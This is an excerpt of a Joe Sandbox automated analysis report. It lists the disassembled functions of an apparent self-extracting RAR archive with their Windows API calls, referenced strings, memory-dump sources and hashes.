                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: "C$($AC
                                                              • API String ID: 1061551593-810783929
                                                              • Opcode ID: 999e508a59e978ce888732d97ba7bb55bd4a45e82338013c8ef7a8a75377b212
                                                              • Instruction ID: 28487f3a4087df8e0025db1315eb53ee8f794711a0c603c53b1181d3a9af43e1
                                                              • Opcode Fuzzy Hash: 999e508a59e978ce888732d97ba7bb55bd4a45e82338013c8ef7a8a75377b212
                                                              • Instruction Fuzzy Hash: 9391F071608744AFD710DF25C844A2BBBE8FFC9701F00496EF99AD7221DB34A906CB66
                                                              Function 0042C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
                                                                • Part of subcall function 0042B92D: _wcsrchr.LIBVCRUNTIME ref: 0042B944
                                                              • _wcslen.LIBCMT ref: 0042C197
                                                              • _wcslen.LIBCMT ref: 0042C1DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$_wcsrchr
                                                              • String ID: .exe$.rar$.sfx
                                                              • API String ID: 3513545583-31770016
                                                              • Opcode ID: 7d4f00878c012dde422700f58044e2d75827f0844f5132c8d956ec56b5336766
                                                              • Instruction ID: bd0ca6e701e38b0c4d6e7f51e4580084a0d38b6f946fcdd9bb59855d0639d456
                                                              • Opcode Fuzzy Hash: 7d4f00878c012dde422700f58044e2d75827f0844f5132c8d956ec56b5336766
                                                              • Instruction Fuzzy Hash: 7041172160037195C731AF64A892A7FB3A4EF45748F64490FF9816B282EF9D4D91C39E
                                                              Function 0042BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0042BB27
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0042A275,?,?,00000800,?,0042A23A,?,0042755C), ref: 0042BBC5
                                                              • _wcslen.LIBCMT ref: 0042BC3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: bd66879104271c51be1bde31eb49f97b714de31bf54a65ac3294d655d02d2d98
                                                              • Instruction ID: ee7395160916719d731f41ea49938048985ad516270e3110f29964d0d951928c
                                                              • Opcode Fuzzy Hash: bd66879104271c51be1bde31eb49f97b714de31bf54a65ac3294d655d02d2d98
                                                              • Instruction Fuzzy Hash: AE41D471600225B6DF21AF22EC01EEB7768EF44385F54412FF854A3241DB78EA908ADC
                                                              Function 0043CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcschr.LIBVCRUNTIME ref: 0043CD84
                                                                • Part of subcall function 0043AF98: _wcschr.LIBVCRUNTIME ref: 0043B033
                                                                • Part of subcall function 00431FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0042C116,00000000,.exe,?,?,00000800,?,?,?,00438E3C), ref: 00431FD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr$CompareString
                                                              • String ID: <$HIDE$MAX$MIN
                                                              • API String ID: 69343711-3358265660
                                                              • Opcode ID: b44b8847097770e2f9e76823620c51de8b55a901127d061a7f99fff130781b8a
                                                              • Instruction ID: 69eeec6bd513be9c3572e8efe408e6aa32bf3361df08ca19b4fb37219569561c
                                                              • Opcode Fuzzy Hash: b44b8847097770e2f9e76823620c51de8b55a901127d061a7f99fff130781b8a
                                                              • Instruction Fuzzy Hash: E63187719002199ADF25DB51DC41EEF73BCEB18354F405167F905E7180EBB89E848FA5
                                                              Function 0043AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0043AAD2
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0043AB01
                                                              • ReleaseDC.USER32(00000000,?), ref: 0043AB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease
                                                              • String ID: -C$7C
                                                              • API String ID: 1429681911-1043828020
                                                              • Opcode ID: 867b403495edac99bfdc7fd8534c24bdd85486ce896edbf5e55ec044cbad6656
                                                              • Instruction ID: 4c15cfe69baf0cedc5c7ffab42a99fdd61a25bd94c4a198356b5acfa31032900
                                                              • Opcode Fuzzy Hash: 867b403495edac99bfdc7fd8534c24bdd85486ce896edbf5e55ec044cbad6656
                                                              • Instruction Fuzzy Hash: FB212A72108304EFD3019FA5DC48E6FBFE9FB8EB52F04082DFA45A2124D7319A548B66
                                                              Function 0042B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0042B9B8
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • _wcschr.LIBVCRUNTIME ref: 0042B9D6
                                                              • _wcschr.LIBVCRUNTIME ref: 0042B9E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 525462905-3142399695
                                                              • Opcode ID: 0a211b8bc4b01694b9c60177233dce869e33cb87067d9f9b345ffe4cdeff9360
                                                              • Instruction ID: 8ce269965ff2d4699a60898998a2e7610b2d1abb78631ec5c0e3437fc6934259
                                                              • Opcode Fuzzy Hash: 0a211b8bc4b01694b9c60177233dce869e33cb87067d9f9b345ffe4cdeff9360
                                                              • Instruction Fuzzy Hash: CB0149A320032165AA306B36AC45D2BB39CEE85770BD0440FF544D7282EB68E84082F9
                                                              Function 0043B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • EndDialog.USER32(?,00000001), ref: 0043B2BE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0043B2D6
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0043B304
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1$xzG
                                                              • API String ID: 445417207-4215412680
                                                              • Opcode ID: dbae2d4dabea19576b2c0aa86efffb5a2dac8bf2961a68744b9bb0ad5b25f08f
                                                              • Instruction ID: cccde5518b3d4fd851fc1fb29c36d42c137fcdd417f4262990db2f3dd7247f7c
                                                              • Opcode Fuzzy Hash: dbae2d4dabea19576b2c0aa86efffb5a2dac8bf2961a68744b9bb0ad5b25f08f
                                                              • Instruction Fuzzy Hash: 0D110832A0012876DB119E64AC4DFFF376CEF1EB01F100166FB45B21C0C7A8990587E9
                                                              Function 0043B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 0043B6ED
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0043B712
                                                              • DeleteObject.GDI32(00000000), ref: 0043B744
                                                              • DeleteObject.GDI32(00000000), ref: 0043B767
                                                                • Part of subcall function 0043A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0043B73D,00000066), ref: 0043A6D5
                                                                • Part of subcall function 0043A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A6EC
                                                                • Part of subcall function 0043A6C2: LoadResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A703
                                                                • Part of subcall function 0043A6C2: LockResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A712
                                                                • Part of subcall function 0043A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0043B73D,00000066), ref: 0043A72D
                                                                • Part of subcall function 0043A6C2: GlobalLock.KERNEL32(00000000), ref: 0043A73E
                                                                • Part of subcall function 0043A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0043A762
                                                                • Part of subcall function 0043A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0043A7A7
                                                                • Part of subcall function 0043A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0043A7C6
                                                                • Part of subcall function 0043A6C2: GlobalFree.KERNEL32(00000000), ref: 0043A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: 808343db1ca8a42f13d0d4bc52d58909e6c5d38f288ddc7126853a034075f62b
                                                              • Instruction ID: 0ee3e3c2779114925c11bca28d621d06e8abd4c197010d8ca1ea3aca25e9bbef
                                                              • Opcode Fuzzy Hash: 808343db1ca8a42f13d0d4bc52d58909e6c5d38f288ddc7126853a034075f62b
                                                              • Instruction Fuzzy Hash: 2B01263254010167C7117B748C0AB7F7AB9EFC9B56F18102AFA40B7395DF298D1542AA
                                                              Function 0043D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • EndDialog.USER32(?,00000001), ref: 0043D64B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0043D661
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0043D675
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0043D684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 15be2547779958ac568ec9d885ccc854feda616fc5a6844b3d563931f3e7e276
                                                              • Instruction ID: cf9b9b1dc795a5fd73cf3ef14f0fe864b1934ee8387094fbdd145aa3a0fe16b0
                                                              • Opcode Fuzzy Hash: 15be2547779958ac568ec9d885ccc854feda616fc5a6844b3d563931f3e7e276
                                                              • Instruction Fuzzy Hash: 40012833A44210BBD2114F64BD0AF6B776DFB9EF02F110436F705A61D0C6AA99098B7E
                                                              Function 00447E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00447E24,00000000,?,00447DC4,00000000,0045C300,0000000C,00447F1B,00000000,00000002), ref: 00447E93
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00447EA6
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00447E24,00000000,?,00447DC4,00000000,0045C300,0000000C,00447F1B,00000000,00000002), ref: 00447EC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: f9be3f533eea28d086c2fa4e7dc90b34aeb33c82dbbb3bc6f28417b85c247a51
                                                              • Instruction ID: ea85674d5894720c0beae45694c5904a1776482a0f8b104b80662e66bfbf7d5d
                                                              • Opcode Fuzzy Hash: f9be3f533eea28d086c2fa4e7dc90b34aeb33c82dbbb3bc6f28417b85c247a51
                                                              • Instruction Fuzzy Hash: 0EF04F31A00308BBDB119FA1DC09B9EBFB4EB44757F1141AAF805A22A1DB34DE45CA98
                                                              Function 0042F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0043081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00430836
                                                                • Part of subcall function 0043081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0042F2D8,Crypt32.dll,00000000,0042F35C,?,?,0042F33E,?,?,?), ref: 00430858
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0042F2E4
                                                              • GetProcAddress.KERNEL32(004681C8,CryptUnprotectMemory), ref: 0042F2F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: 3f5ed62d2afd1520dc0054e275eb69f00d2d62e464b2e443ea8a1d69eedbd7ef
                                                              • Instruction ID: c1ba67201d956e893cd9cb56e4bd004a9f2dc1441cc1ac3c314b2bae6a08bf8d
                                                              • Opcode Fuzzy Hash: 3f5ed62d2afd1520dc0054e275eb69f00d2d62e464b2e443ea8a1d69eedbd7ef
                                                              • Instruction Fuzzy Hash: 68E026319007119FC7209F38A80CB037AE46F04B4BF20883FF8DA93282C6BCD8448B18
                                                              Function 00442BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: e1af721194bc670ae3f948520727ef6e23f27cffb9c0fa51939cfe79af72a886
                                                              • Instruction ID: cfcd3821fae4f6a54afe8e9f19beab241c5ae8078ccb40633bd78b8879294d23
                                                              • Opcode Fuzzy Hash: e1af721194bc670ae3f948520727ef6e23f27cffb9c0fa51939cfe79af72a886
                                                              • Instruction Fuzzy Hash: 6D51CFB1900212AFFB288F15DA85B6AB3A4BF54305F64402FF801576A1D7B9AD41D798
                                                              Function 0044BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044BF39
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044BF5C
                                                                • Part of subcall function 00448E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044BF82
                                                              • _free.LIBCMT ref: 0044BF95
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044BFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 1449a996f7cd179b53ee26478cbfb1734d0751b5c0d5d9c506932e9c87db7766
                                                              • Instruction ID: d957273b222065889ae52f2c5f7f3e8c4ab36bdb365fdd3b237eec48fea25d3a
                                                              • Opcode Fuzzy Hash: 1449a996f7cd179b53ee26478cbfb1734d0751b5c0d5d9c506932e9c87db7766
                                                              • Instruction Fuzzy Hash: 5901D4726017117F37211ABB5C4CC7B6A6DDEC2BAA324012EF908C3202EF68CD0695F8
                                                              Function 00449869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,004491AD,0044B188,?,00449813,00000001,00000364,?,00443F73,00000050,?,00461030,00000200), ref: 0044986E
                                                              • _free.LIBCMT ref: 004498A3
                                                              • _free.LIBCMT ref: 004498CA
                                                              • SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 004498D7
                                                              • SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 004498E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 8f2a31d42377b30815483ae24049a24142e44326ed754ebaeacaccd640edc9dc
                                                              • Instruction ID: 0c8c68428d1917263590d2932584e596c1469de9410d1bec006952a496f4c3fe
                                                              • Opcode Fuzzy Hash: 8f2a31d42377b30815483ae24049a24142e44326ed754ebaeacaccd640edc9dc
                                                              • Instruction Fuzzy Hash: 500121321A07016BB312772A6C8991B252ADFD27AA734013BF41092293EE2CCD02622D
                                                              Function 00430EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004311CF: ResetEvent.KERNEL32(?), ref: 004311E1
                                                                • Part of subcall function 004311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004311F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00430F21
                                                              • CloseHandle.KERNEL32(?,?), ref: 00430F3B
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00430F54
                                                              • CloseHandle.KERNEL32(?), ref: 00430F60
                                                              • CloseHandle.KERNEL32(?), ref: 00430F6C
                                                                • Part of subcall function 00430FE4: WaitForSingleObject.KERNEL32(?,000000FF,00431206,?), ref: 00430FEA
                                                                • Part of subcall function 00430FE4: GetLastError.KERNEL32(?), ref: 00430FF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
